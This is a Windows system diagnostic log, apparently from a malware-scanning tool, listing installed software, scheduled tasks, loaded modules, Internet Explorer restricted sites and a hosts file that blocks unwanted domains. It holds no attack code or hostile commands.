Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.7083 - Realtek Semiconductor Corp.)
Remote Mouse version 3.000 (HKLM-x32\...\{01E4BC6D-3ACC-45E1-8928-C2FF626F63F3}_is1) (Version: 3.000 - Remote Mouse)
Renegade X (HKLM\...\UDK-) (Version:  - Totem Arts)
RivaTuner Statistics Server 6.1.0 (HKLM-x32\...\RTSS) (Version: 6.1.0 - Unwinder)
Rockstar Games Social Club (HKLM-x32\...\Rockstar Games Social Club) (Version: 1.1.9.6 - Rockstar Games)
Roslyn Language Services - x86 (x32 Version: 14.0.23107 - Microsoft Corporation) Hidden
SAMSUNG USB Driver for Mobile Phones (HKLM\...\{D0795B21-0CDA-4a92-AB9E-6E92D8111E44}) (Version: 1.3.2300.0 - SAMSUNG Electronics Co., Ltd.)
Service Pack 1 for SQL Server 2008 (KB968369) (64-bit) (HKLM\...\KB968369) (Version: 10.1.2531.0 - Microsoft Corporation)
ShadowCopy (HKLM-x32\...\{117CE366-3EED-48C5-BF6A-E0F47A0E68A4}) (Version: 2.02.000 - Runtime Software)
Skype™ 7.14 (HKLM-x32\...\{6A0549A9-1B96-498C-ACBC-3943001FEB19}) (Version: 7.14.106 - Skype Technologies S.A.)
Snaz version 1.12.4.0 (HKLM-x32\...\{70A76031-FDC6-4F9B-BB5C-33776703F45A}_is1) (Version: 1.12.4.0 - JimsApps)
Sophos Virus Removal Tool (HKLM-x32\...\{B829E117-D072-41EA-9606-9826A38D34C1}) (Version: 2.5.5 - Sophos Limited)
Sound Blaster X-Fi (HKLM-x32\...\{18F11181-EA1A-42AE-AF89-4867C7F7A6FA}) (Version: 1.0 - )
Source SDK (HKLM-x32\...\Steam App 211) (Version:  - Valve)
SpeedFan (remove only) (HKLM-x32\...\SpeedFan) (Version:  - )
SPEEDLINK PHANTOM HAWK Flightstick (HKLM-x32\...\{762C7640-64D8-4A0F-9A53-29EA560914AB}) (Version: v3.61a - lsw)
Spybot - Search & Destroy (HKLM-x32\...\{B4092C6D-E886-4CB2-BA68-FE5A88D31DE6}_is1) (Version: 1.6.2 - Safer Networking Limited)
Spyder2express (HKLM-x32\...\Spyder2express) (Version:  - )
Sql Server Customer Experience Improvement Program (Version: 10.1.2531.0 - Microsoft Corporation) Hidden
Starbound - Unstable (HKLM-x32\...\Steam App 367540) (Version:  - )
Starbound (HKLM-x32\...\Steam App 211820) (Version:  - )
Steam (HKLM-x32\...\Steam) (Version:  - Valve Corporation)
SteamVR (HKLM-x32\...\Steam App 250820) (Version:  - )
Strong Bad Episode 2: Strong Badia the Free (HKLM\...\Steam App 8350) (Version:  - Telltale Games)
Team Explorer for Microsoft Visual Studio 2015 (x32 Version: 14.0.23102 - Microsoft Corporation) Hidden
TeamSpeak 3 Client (HKU\S-1-5-21-1771700083-1338792134-2885675772-1001\...\TeamSpeak 3 Client) (Version: 3.0.16 - TeamSpeak Systems GmbH)
Test Tools for Microsoft Visual Studio 2015 (x32 Version: 14.0.23107 - Microsoft Corporation) Hidden
The Elder Scrolls V: Skyrim (HKLM-x32\...\Steam App 72850) (Version:  - Bethesda Game Studios)
The Sims™ 4 (HKLM-x32\...\{48EBEBBF-B9F8-4520-A3CF-89A730721917}) (Version: 1.13.104.1010 - Electronic Arts Inc.)
ThuumicShouter version 1.94.2 Open Beta (HKLM-x32\...\{C9C550CB-2390-410E-883F-3BE147D64143}_is1) (Version: 1.94.2 Open Beta - DeadlyHamster)
Trillian (HKLM-x32\...\Trillian) (Version:  - Cerulean Studios, LLC)
uLink (HKLM-x32\...\uLink) (Version: 1.5.8 Lina (2014-03-13) - MuchDifferent)
Undertale (HKLM-x32\...\Steam App 391540) (Version:  - tobyfox)
Unity (HKLM-x32\...\Unity) (Version: 5.4.0f3 - Unity Technologies ApS)
Unity Web Player (HKU\S-1-5-21-1771700083-1338792134-2885675772-1001\...\UnityWebPlayer) (Version: 5.3.5f1 - Unity Technologies ApS)
Vimicro USB2.0 UVC PC Camera (HKLM-x32\...\{71A51A91-E7D3-11DB-A386-005056C00008}) (Version: 2009.03.18 - Vimicro Corp.)
Visual Studio 2010 Prerequisites - English (HKLM\...\{662014D2-0450-37ED-ABAE-157C88127BEB}) (Version: 10.0.40219 - Microsoft Corporation)
Visual Studio 2010 Tools for SQL Server Compact 3.5 SP2 ENU (HKLM-x32\...\{112C23F2-C036-4D40-BED4-0CB47BF5555C}) (Version: 4.0.8080.0 - Microsoft Corporation)
WCF Data Services 5.6.4 Runtime (x32 Version: 5.6.62175.4 - Microsoft Corporation) Hidden
WCF Data Services Tools for Microsoft Visual Studio 2015 (x32 Version: 5.6.62175.4 - Microsoft Corporation) Hidden
WCF RIA Services V1.0 SP1 (HKLM-x32\...\{D9E6001A-5DC3-4620-AF7A-80B6CD48645D}) (Version: 4.1.60114.0 - Microsoft Corporation)
Web Deployment Tool (HKLM\...\{0F37D969-1260-419E-B308-EF7D29ABDE20}) (Version: 1.1.0618 - Microsoft Corporation)
WebM Project Directshow Filters (HKU\S-1-5-21-1771700083-1338792134-2885675772-1001\...\webmdshow) (Version:  - )
WhoCrashed 5.03 (HKLM\...\WhoCrashed_is1) (Version:  - Resplendence Software Projects Sp.)
Winamp (HKLM-x32\...\Winamp) (Version: 5.666  - Nullsoft, Inc)
WinDirStat 1.1.2 (HKU\S-1-5-21-1771700083-1338792134-2885675772-1001\...\WinDirStat) (Version:  - )
Windows 7 USB/DVD Download Tool (HKLM-x32\...\{CCF298AF-9CE1-4B26-B251-486E98A34789}) (Version: 1.0.30 - Microsoft Corporation)
Windows Live Essentials (HKLM-x32\...\WinLiveSuite) (Version: 16.4.3528.0331 - Microsoft Corporation)
Windows Speech Recognition Macros (HKLM-x32\...\{8DC197D6-F4AB-44E0-ACF7-210355E6F389}) (Version: 1.0.6862.19 - Microsoft Corporation)
WinRAR 5.10 beta 4 (64-bit) (HKLM\...\WinRAR archiver) (Version: 5.10.4 - win.rar GmbH)
World Machine 2 Professional Edition (HKLM-x32\...\World Machine2Pro) (Version:  - )
x264vfw - H.264/MPEG-4 AVC codec (remove only) (HKLM-x32\...\x264vfw) (Version:  - )
x264vfw - H.264/MPEG-4 AVC codec for x64 (remove only) (HKLM-x32\...\x264vfw64) (Version:  - )
Xiph.Org Open Codecs 0.85.17777 (HKLM-x32\...\Open Codecs) (Version: 0.85.17777 - Xiph.Org)
ZoneAlarm Antivirus (x32 Version: 11.0.768.000 - Check Point Software Technologies Ltd.) Hidden

==================== Custom CLSID (Whitelisted): ==========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

CustomCLSID: HKU\S-1-5-21-1771700083-1338792134-2885675772-1001_Classes\CLSID\{D45F043D-F17F-4e8a-8435-70971D9FA46D}\InprocServer32 -> C:\Program Files\Blender Foundation\Blender\BlendThumb64.dll ()

==================== Scheduled Tasks (Whitelisted) =============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

Task: {1EAB7A46-62C8-4079-B5C1-746FC987684A} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-30] (Google Inc.)
Task: {7536A8CB-5435-4FD2-8A49-154A24611285} - System32\Tasks\DropboxUpdateTaskMachineCore => C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe [2016-04-07] (Dropbox, Inc.)
Task: {8C1E609C-643B-44E0-9C36-0CBEDF5BACE5} - System32\Tasks\DropboxUpdateTaskMachineUA => C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe [2016-04-07] (Dropbox, Inc.)
Task: {8CEE459F-7B07-47BA-A871-8641D83863D4} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-30] (Google Inc.)
Task: {B3975A72-DCDB-4759-8749-9B22F24DC442} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2016-08-01] (Adobe Systems Incorporated)

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)

Task: C:\Windows\Tasks\Adobe Flash Player Updater.job => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
Task: C:\Windows\Tasks\DropboxUpdateTaskMachineCore.job => C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe
Task: C:\Windows\Tasks\DropboxUpdateTaskMachineUA.job => C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe

==================== Shortcuts =============================

(The entries could be listed to be restored or removed.)

==================== Loaded Modules (Whitelisted) ==============

2015-12-11 18:13 - 2015-11-24 11:40 - 00116344 _____ () C:\Program Files\NVIDIA Corporation\Display\NvSmartMax64.dll
2015-02-02 20:10 - 2014-12-03 14:17 - 00231952 _____ () C:\Program Files (x86)\Oculus\Service\OVRServiceLauncher.exe
2015-01-03 19:20 - 2015-12-10 01:36 - 00076152 _____ () C:\Windows\system32\PnkBstrA.exe
2014-05-12 02:49 - 2014-05-12 02:49 - 00222720 _____ () D:\Program Files (x86)\Notepad++\NppShell_06.dll
2015-02-02 20:10 - 2014-12-03 14:17 - 01176592 _____ () C:\Program Files (x86)\Oculus\Service\OVRServer_x64.exe
2015-03-06 17:07 - 2015-03-06 17:07 - 00908568 _____ () C:\Program Files\Logitech Gaming Software\libGLESv2.dll
2015-09-19 14:20 - 2015-09-19 14:20 - 01095448 _____ () C:\Program Files\Logitech Gaming Software\platforms\qwindows.dll
2015-03-06 17:07 - 2015-03-06 17:07 - 00060184 _____ () C:\Program Files\Logitech Gaming Software\libEGL.dll
2015-09-19 14:20 - 2015-09-19 14:20 - 00240408 _____ () C:\Program Files\Logitech Gaming Software\imageformats\qjpeg.dll
2014-11-01 22:25 - 2013-07-13 17:21 - 07922176 _____ () C:\Users\King\Downloads\cpk_05\CPKeeper.exe
2016-04-07 22:01 - 2016-09-21 18:44 - 00035792 _____ () C:\Program Files (x86)\Dropbox\Client\_multiprocessing.pyd
2016-10-13 14:55 - 2016-09-21 18:44 - 00145864 _____ () C:\Program Files (x86)\Dropbox\Client\pyexpat.pyd
2016-10-13 14:55 - 2016-09-21 18:45 - 00019408 _____ () C:\Program Files (x86)\Dropbox\Client\faulthandler.pyd
2016-10-13 14:55 - 2016-09-21 18:44 - 00116688 _____ () C:\Program Files (x86)\Dropbox\Client\pywintypes27.dll
2016-04-07 22:01 - 2016-09-21 18:44 - 00100296 _____ () C:\Program Files (x86)\Dropbox\Client\_ctypes.pyd
2016-04-07 22:01 - 2016-09-21 18:44 - 00018888 _____ () C:\Program Files (x86)\Dropbox\Client\select.pyd
2016-04-07 22:01 - 2016-10-10 11:35 - 00019760 _____ () C:\Program Files (x86)\Dropbox\Client\tornado.speedups.pyd
2016-04-07 22:01 - 2016-09-21 18:44 - 00694224 _____ () C:\Program Files (x86)\Dropbox\Client\unicodedata.pyd
2016-10-13 14:55 - 2016-10-10 11:35 - 00020816 _____ () C:\Program Files (x86)\Dropbox\Client\cryptography.hazmat.bindings._constant_time.pyd
2016-04-07 22:01 - 2016-09-21 18:45 - 00123856 _____ () C:\Program Files (x86)\Dropbox\Client\_cffi_backend.pyd
2016-10-13 14:55 - 2016-10-10 11:35 - 01682760 _____ () C:\Program Files (x86)\Dropbox\Client\cryptography.hazmat.bindings._openssl.pyd
2016-10-13 14:55 - 2016-10-10 11:35 - 00020808 _____ () C:\Program Files (x86)\Dropbox\Client\cryptography.hazmat.bindings._padding.pyd
2016-04-07 22:01 - 2016-09-21 18:46 - 00105928 _____ () C:\Program Files (x86)\Dropbox\Client\win32api.pyd
2016-08-05 12:43 - 2016-10-10 11:35 - 00021312 _____ () C:\Program Files (x86)\Dropbox\Client\winffi.crt.compiled._winffi_crt.pyd
2016-10-13 14:55 - 2016-10-10 11:35 - 00052024 _____ () C:\Program Files (x86)\Dropbox\Client\psutil._psutil_windows.pyd
2016-10-13 14:55 - 2016-10-10 11:35 - 00038696 _____ () C:\Program Files (x86)\Dropbox\Client\fastpath.pyd
2016-10-13 14:55 - 2016-09-21 18:44 - 00392144 _____ () C:\Program Files (x86)\Dropbox\Client\pythoncom27.dll
2016-10-13 14:55 - 2016-09-21 18:46 - 00020936 _____ () C:\Program Files (x86)\Dropbox\Client\mmapfile.pyd
2016-04-07 22:01 - 2016-09-21 18:46 - 00024528 _____ () C:\Program Files (x86)\Dropbox\Client\win32event.pyd
2016-04-07 22:01 - 2016-09-21 18:46 - 00116176 _____ () C:\Program Files (x86)\Dropbox\Client\win32security.pyd
2016-04-07 22:01 - 2016-10-10 11:35 - 00381752 _____ () C:\Program Files (x86)\Dropbox\Client\win32com.shell.shell.pyd
2016-04-07 22:01 - 2016-09-21 18:46 - 00124880 _____ () C:\Program Files (x86)\Dropbox\Client\win32file.pyd
2016-08-05 12:43 - 2016-10-10 11:35 - 00025424 _____ () C:\Program Files (x86)\Dropbox\Client\winffi.kernel32.compiled._winffi_kernel32.pyd
2016-04-07 22:01 - 2016-09-21 18:46 - 00024016 _____ () C:\Program Files (x86)\Dropbox\Client\win32clipboard.pyd
2016-04-07 22:01 - 2016-09-21 18:46 - 00175560 _____ () C:\Program Files (x86)\Dropbox\Client\win32gui.pyd
2016-04-07 22:01 - 2016-09-21 18:46 - 00030160 _____ () C:\Program Files (x86)\Dropbox\Client\win32pipe.pyd
2016-04-07 22:01 - 2016-09-21 18:46 - 00043472 _____ () C:\Program Files (x86)\Dropbox\Client\win32process.pyd
2016-04-07 22:01 - 2016-09-21 18:46 - 00048592 _____ () C:\Program Files (x86)\Dropbox\Client\win32service.pyd
2016-04-07 22:01 - 2016-09-21 18:46 - 00057808 _____ () C:\Program Files (x86)\Dropbox\Client\win32evtlog.pyd
2016-04-07 22:01 - 2016-09-21 18:46 - 00024016 _____ () C:\Program Files (x86)\Dropbox\Client\win32profile.pyd
2016-10-13 14:55 - 2016-10-10 11:35 - 00246592 _____ () C:\Program Files (x86)\Dropbox\Client\breakpad.client.windows.handler.pyd
2016-10-13 14:55 - 2016-10-10 11:35 - 00026456 _____ () C:\Program Files (x86)\Dropbox\Client\dropbox.infinite.win.compiled._driverinstallation.pyd
2016-08-05 12:43 - 2016-09-21 18:45 - 00241104 _____ () C:\Program Files (x86)\Dropbox\Client\_jpegtran.pyd
2016-10-13 14:55 - 2016-10-10 11:35 - 00020280 _____ () C:\Program Files (x86)\Dropbox\Client\cpuid.compiled._cpuid.pyd
2016-04-07 22:01 - 2016-09-21 18:46 - 00028616 _____ () C:\Program Files (x86)\Dropbox\Client\win32ts.pyd
2016-04-07 22:01 - 2016-10-10 11:35 - 00023376 _____ () C:\Program Files (x86)\Dropbox\Client\winscreenshot.compiled._CaptureScreenshot.pyd
2016-04-07 22:01 - 2016-10-10 11:35 - 00020800 _____ () C:\Program Files (x86)\Dropbox\Client\winffi.iphlpapi._winffi_iphlpapi.pyd
2016-04-07 22:01 - 2016-10-10 11:35 - 00019776 _____ () C:\Program Files (x86)\Dropbox\Client\winffi.winerror._winffi_winerror.pyd
2016-04-07 22:01 - 2016-10-10 11:35 - 00020800 _____ () C:\Program Files (x86)\Dropbox\Client\winffi.wininet._winffi_wininet.pyd
2016-04-07 22:01 - 2016-09-21 18:46 - 00350152 _____ () C:\Program Files (x86)\Dropbox\Client\winxpgui.pyd
2016-04-07 22:01 - 2016-10-10 11:35 - 00022352 _____ () C:\Program Files (x86)\Dropbox\Client\winverifysignature.compiled._VerifySignature.pyd
2016-10-13 14:55 - 2016-10-10 11:35 - 00024392 _____ () C:\Program Files (x86)\Dropbox\Client\librsyncffi.compiled._librsyncffi.pyd
2016-10-13 14:55 - 2016-09-21 18:42 - 00036296 _____ () C:\Program Files (x86)\Dropbox\Client\librsync.dll
2016-10-13 14:55 - 2016-10-10 11:35 - 00084280 _____ () C:\Program Files (x86)\Dropbox\Client\dropbox_sqlite_ext.DLL
2016-10-13 14:55 - 2016-10-10 11:35 - 01826096 _____ () C:\Program Files (x86)\Dropbox\Client\PyQt5.QtCore.pyd
2016-04-07 22:01 - 2016-09-21 18:45 - 00083912 _____ () C:\Program Files (x86)\Dropbox\Client\sip.pyd
2016-10-13 14:55 - 2016-10-10 11:35 - 00531248 _____ () C:\Program Files (x86)\Dropbox\Client\PyQt5.QtNetwork.pyd
2016-10-13 14:55 - 2016-10-10 11:35 - 03928880 _____ () C:\Program Files (x86)\Dropbox\Client\PyQt5.QtWidgets.pyd
2016-10-13 14:55 - 2016-10-10 11:35 - 01972528 _____ () C:\Program Files (x86)\Dropbox\Client\PyQt5.QtGui.pyd
2016-10-13 14:55 - 2016-10-10 11:35 - 00133424 _____ () C:\Program Files (x86)\Dropbox\Client\PyQt5.QtWebKit.pyd
2016-10-13 14:55 - 2016-10-10 11:35 - 00224056 _____ () C:\Program Files (x86)\Dropbox\Client\PyQt5.QtWebKitWidgets.pyd
2016-10-13 14:55 - 2016-10-10 11:35 - 00207672 _____ () C:\Program Files (x86)\Dropbox\Client\PyQt5.QtPrintSupport.pyd
2016-08-05 12:43 - 2016-10-10 11:35 - 00020288 _____ () C:\Program Files (x86)\Dropbox\Client\winffi.user32._winffi_user32.pyd
2016-10-13 14:55 - 2016-09-21 18:49 - 00017864 _____ () C:\Program Files (x86)\Dropbox\Client\libEGL.dll
2016-10-13 14:55 - 2016-09-21 18:49 - 01631184 _____ () C:\Program Files (x86)\Dropbox\Client\libGLESv2.dll
2016-04-07 22:01 - 2016-09-21 18:46 - 00060880 _____ () C:\Program Files (x86)\Dropbox\Client\win32print.pyd
2016-08-05 12:43 - 2016-10-10 11:35 - 00024904 _____ () C:\Program Files (x86)\Dropbox\Client\winffi.winhttp.compiled._winffi_winhttp.pyd
2016-10-13 14:55 - 2016-10-10 11:35 - 00546096 _____ () C:\Program Files (x86)\Dropbox\Client\PyQt5.QtQuick.pyd
2016-10-13 14:55 - 2016-10-10 11:35 - 00357680 _____ () C:\Program Files (x86)\Dropbox\Client\PyQt5.QtQml.pyd
2016-10-13 14:55 - 2016-10-10 11:35 - 00042808 _____ () C:\Program Files (x86)\Dropbox\Client\PyQt5.QtWebChannel.pyd
2016-10-13 14:55 - 2016-10-10 11:35 - 00168760 _____ () C:\Program Files (x86)\Dropbox\Client\PyQt5.QtWebEngineWidgets.pyd
2014-03-01 01:20 - 2014-03-01 01:20 - 00002560 _____ () C:\Windows\SysWOW64\CTXFIRES.DLL
2014-05-09 20:35 - 2009-03-26 14:46 - 00148480 _____ () C:\Windows\SysWOW64\APOMngr.DLL
2015-05-27 00:00 - 2015-05-27 00:00 - 00059904 _____ () D:\Program Files (x86)\Trillian\zlib1.dll
2015-05-27 00:00 - 2015-05-27 00:00 - 00187392 _____ () D:\Program Files (x86)\Trillian\libpng15.dll
2015-05-27 00:00 - 2015-05-27 00:00 - 00006656 _____ () d:\program files (x86)\trillian\languages\en\trillian.dll
2015-05-27 00:00 - 2015-05-27 00:00 - 00065536 _____ () D:\Program Files (x86)\Trillian\libungif.dll
2015-05-27 00:00 - 2015-05-27 00:00 - 00003584 _____ () d:\program files (x86)\trillian\languages\en\toolkit.dll
2015-05-27 00:00 - 2015-05-27 00:00 - 00006656 _____ () d:\program files (x86)\trillian\languages\en\events.dll
2015-05-27 00:00 - 2015-05-27 00:00 - 00010752 _____ () d:\program files (x86)\trillian\languages\en\buddy.dll
2015-05-27 00:00 - 2015-05-27 00:00 - 00007168 _____ () d:\program files (x86)\trillian\languages\en\talk.dll
2016-10-03 14:19 - 2016-09-24 20:47 - 01805416 _____ () C:\Program Files (x86)\Google\Chrome\Application\53.0.2785.143\libglesv2.dll
2016-10-03 14:19 - 2016-09-24 20:47 - 00093288 _____ () C:\Program Files (x86)\Google\Chrome\Application\53.0.2785.143\libegl.dll
2016-02-17 23:01 - 2016-09-07 20:14 - 00784672 _____ () D:\Program Files (x86)\Steam\SDL2.dll
2016-02-17 23:01 - 2016-08-31 18:02 - 04969248 _____ () D:\Program Files (x86)\Steam\v8.dll
2016-02-17 23:01 - 2016-08-31 18:02 - 01563936 _____ () D:\Program Files (x86)\Steam\icui18n.dll
2016-02-17 23:01 - 2016-08-31 18:02 - 01195296 _____ () D:\Program Files (x86)\Steam\icuuc.dll
2016-02-17 23:01 - 2016-10-12 18:58 - 02321696 _____ () D:\Program Files (x86)\Steam\video.dll
2016-02-17 23:01 - 2016-01-27 00:49 - 02549760 _____ () D:\Program Files (x86)\Steam\libavcodec-56.dll
2016-02-17 23:01 - 2016-01-27 00:49 - 00442880 _____ () D:\Program Files (x86)\Steam\libavutil-54.dll
2016-02-17 23:01 - 2016-01-27 00:49 - 00491008 _____ () D:\Program Files (x86)\Steam\libavformat-56.dll
2016-02-17 23:01 - 2016-01-27 00:49 - 00332800 _____ () D:\Program Files (x86)\Steam\libavresample-2.dll
2016-02-17 23:01 - 2016-01-27 00:49 - 00485888 _____ () D:\Program Files (x86)\Steam\libswscale-3.dll
2016-02-17 23:01 - 2016-10-12 18:58 - 00836896 _____ () D:\Program Files (x86)\steam\bin\chromehtml.DLL
2016-03-08 17:48 - 2016-07-04 15:17 - 00266560 _____ () D:\Program Files (x86)\Steam\openvr_api.dll
2016-10-13 22:43 - 2016-08-04 13:56 - 49825056 _____ () D:\Program Files (x86)\steam\bin\cef\cef.winxp\libcef.dll
2016-02-17 23:01 - 2015-09-24 16:52 - 00119208 _____ () D:\Program Files (x86)\Steam\winh264.dll

==================== Alternate Data Streams (Whitelisted) =========

(If an entry is included in the fixlist, only the ADS will be removed.)

AlternateDataStreams: C:\scriptsBackup.zip:com.dropbox.attributes [168]
AlternateDataStreams: C:\Users\King\Desktop\mechGame.zip:com.dropbox.attributes [168]

==================== Safe Mode (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\PAexec => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\PAexec => ""="Service"

==================== Association (Whitelisted) ===============

(If an entry is included in the fixlist, the registry item will be restored to default or removed.)


==================== Internet Explorer trusted/restricted ===============

(If an entry is included in the fixlist, it will be removed from the registry.)

IE restricted site: HKU\.DEFAULT\...\007guard.com -> install.007guard.com
IE restricted site: HKU\.DEFAULT\...\008i.com -> 008i.com
IE restricted site: HKU\.DEFAULT\...\008k.com -> www.008k.com
IE restricted site: HKU\.DEFAULT\...\00hq.com -> www.00hq.com
IE restricted site: HKU\.DEFAULT\...\010402.com -> 010402.com
IE restricted site: HKU\.DEFAULT\...\032439.com -> 80gw6ry3i3x3qbrkwhxhw.032439.com
IE restricted site: HKU\.DEFAULT\...\0scan.com -> www.0scan.com
IE restricted site: HKU\.DEFAULT\...\1-2005-search.com -> www.1-2005-search.com
IE restricted site: HKU\.DEFAULT\...\1-domains-registrations.com -> www.1-domains-registrations.com
IE restricted site: HKU\.DEFAULT\...\1000gratisproben.com -> www.1000gratisproben.com
IE restricted site: HKU\.DEFAULT\...\1001namen.com -> www.1001namen.com
IE restricted site: HKU\.DEFAULT\...\100888290cs.com -> mir.100888290cs.com
IE restricted site: HKU\.DEFAULT\...\100sexlinks.com -> www.100sexlinks.com
IE restricted site: HKU\.DEFAULT\...\10sek.com -> www.10sek.com
IE restricted site: HKU\.DEFAULT\...\12-26.net -> user1.12-26.net
IE restricted site: HKU\.DEFAULT\...\12-27.net -> user1.12-27.net
IE restricted site: HKU\.DEFAULT\...\123fporn.info -> www.123fporn.info
IE restricted site: HKU\.DEFAULT\...\123haustiereundmehr.com -> www.123haustiereundmehr.com
IE restricted site: HKU\.DEFAULT\...\123moviedownload.com -> www.123moviedownload.com
IE restricted site: HKU\.DEFAULT\...\123simsen.com -> www.123simsen.com

There are 7915 more sites.

IE restricted site: HKU\S-1-5-21-1771700083-1338792134-2885675772-1001\...\007guard.com -> install.007guard.com
IE restricted site: HKU\S-1-5-21-1771700083-1338792134-2885675772-1001\...\008i.com -> 008i.com
IE restricted site: HKU\S-1-5-21-1771700083-1338792134-2885675772-1001\...\008k.com -> www.008k.com
IE restricted site: HKU\S-1-5-21-1771700083-1338792134-2885675772-1001\...\00hq.com -> www.00hq.com
IE restricted site: HKU\S-1-5-21-1771700083-1338792134-2885675772-1001\...\010402.com -> 010402.com
IE restricted site: HKU\S-1-5-21-1771700083-1338792134-2885675772-1001\...\032439.com -> 80gw6ry3i3x3qbrkwhxhw.032439.com
IE restricted site: HKU\S-1-5-21-1771700083-1338792134-2885675772-1001\...\0scan.com -> www.0scan.com
IE restricted site: HKU\S-1-5-21-1771700083-1338792134-2885675772-1001\...\1-2005-search.com -> www.1-2005-search.com
IE restricted site: HKU\S-1-5-21-1771700083-1338792134-2885675772-1001\...\1-domains-registrations.com -> www.1-domains-registrations.com
IE restricted site: HKU\S-1-5-21-1771700083-1338792134-2885675772-1001\...\1000gratisproben.com -> www.1000gratisproben.com
IE restricted site: HKU\S-1-5-21-1771700083-1338792134-2885675772-1001\...\1001namen.com -> www.1001namen.com
IE restricted site: HKU\S-1-5-21-1771700083-1338792134-2885675772-1001\...\100888290cs.com -> mir.100888290cs.com
IE restricted site: HKU\S-1-5-21-1771700083-1338792134-2885675772-1001\...\100sexlinks.com -> www.100sexlinks.com
IE restricted site: HKU\S-1-5-21-1771700083-1338792134-2885675772-1001\...\10sek.com -> www.10sek.com
IE restricted site: HKU\S-1-5-21-1771700083-1338792134-2885675772-1001\...\12-26.net -> user1.12-26.net
IE restricted site: HKU\S-1-5-21-1771700083-1338792134-2885675772-1001\...\12-27.net -> user1.12-27.net
IE restricted site: HKU\S-1-5-21-1771700083-1338792134-2885675772-1001\...\123fporn.info -> www.123fporn.info
IE restricted site: HKU\S-1-5-21-1771700083-1338792134-2885675772-1001\...\123haustiereundmehr.com -> www.123haustiereundmehr.com
IE restricted site: HKU\S-1-5-21-1771700083-1338792134-2885675772-1001\...\123moviedownload.com -> www.123moviedownload.com
IE restricted site: HKU\S-1-5-21-1771700083-1338792134-2885675772-1001\...\123simsen.com -> www.123simsen.com

There are 7915 more sites.


==================== Hosts content: ==========================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2015-10-16 21:24 - 2016-10-19 16:52 - 00452470 ____R C:\Windows\system32\Drivers\etc\hosts

127.0.0.1       localhost127.0.0.1	www.007guard.com
127.0.0.1	007guard.com
127.0.0.1	008i.com
127.0.0.1	www.008k.com
127.0.0.1	008k.com
127.0.0.1	www.00hq.com
127.0.0.1	00hq.com
127.0.0.1	010402.com
127.0.0.1	www.032439.com
127.0.0.1	032439.com
127.0.0.1	www.0scan.com
127.0.0.1	0scan.com
127.0.0.1	1000gratisproben.com
127.0.0.1	www.1000gratisproben.com
127.0.0.1	1001namen.com
127.0.0.1	www.1001namen.com
127.0.0.1	100888290cs.com
127.0.0.1	www.100888290cs.com
127.0.0.1	www.100sexlinks.com
127.0.0.1	100sexlinks.com
127.0.0.1	10sek.com
127.0.0.1	www.10sek.com
127.0.0.1	www.1-2005-search.com
127.0.0.1	1-2005-search.com
127.0.0.1	123fporn.info
127.0.0.1	www.123fporn.info
127.0.0.1	www.123haustiereundmehr.com
127.0.0.1	123haustiereundmehr.com
127.0.0.1	123moviedownload.com
127.0.0.1	www.123moviedownload.com

There are 15553 more lines.


==================== Other Areas ============================

(Currently there is no automatic fix for this section.)

HKU\S-1-5-21-1771700083-1338792134-2885675772-1001\Control Panel\Desktop\\Wallpaper -> C:\Users\King\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg
DNS Servers: 8.8.8.8 - 8.8.4.4
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Windows Firewall is enabled.

==================== MSCONFIG/TASK MANAGER disabled items ==

MSCONFIG\Services: AdobeARMservice => 2
MSCONFIG\Services: AdobeFlashPlayerUpdateSvc => 3
MSCONFIG\Services: gupdate => 2
MSCONFIG\Services: gupdatem => 3
MSCONFIG\Services: MozillaMaintenance => 3
MSCONFIG\Services: nlsvc => 2
MSCONFIG\Services: Origin Client Service => 3
MSCONFIG\Services: RemoteMouseService => 2
MSCONFIG\Services: SBSDWSCService => 2
MSCONFIG\Services: SkypeUpdate => 2
MSCONFIG\startupfolder: C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^ColorVisionStartup.lnk => C:\Windows\pss\ColorVisionStartup.lnk.CommonStartup
MSCONFIG\startupreg: Adobe ARM => "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe"
MSCONFIG\startupreg: BrStsWnd => C:\Program Files (x86)\Brownie\BrstsW64.exe Autorun
MSCONFIG\startupreg: DAEMON Tools Lite => "D:\Program Files (x86)\DAEMON Tools Lite\DTLite.exe" -autorun
MSCONFIG\startupreg: Dxtory Update Checker 2.0 => D:\Program Files (x86)\ExKode\Dxtory2.0\UpdateChecker.exe
MSCONFIG\startupreg: JMB36X IDE Setup => C:\Windows\RaidTool\xInsIDE.exe
MSCONFIG\startupreg: NUSB3MON => "C:\Program Files (x86)\NEC Electronics\USB 3.0 Host Controller Driver\Application\nusb3mon.exe"
MSCONFIG\startupreg: RTHDVCPL => "C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe" -s
MSCONFIG\startupreg: UpdReg => C:\Windows\UpdReg.EXE

==================== FirewallRules (Whitelisted) ===============

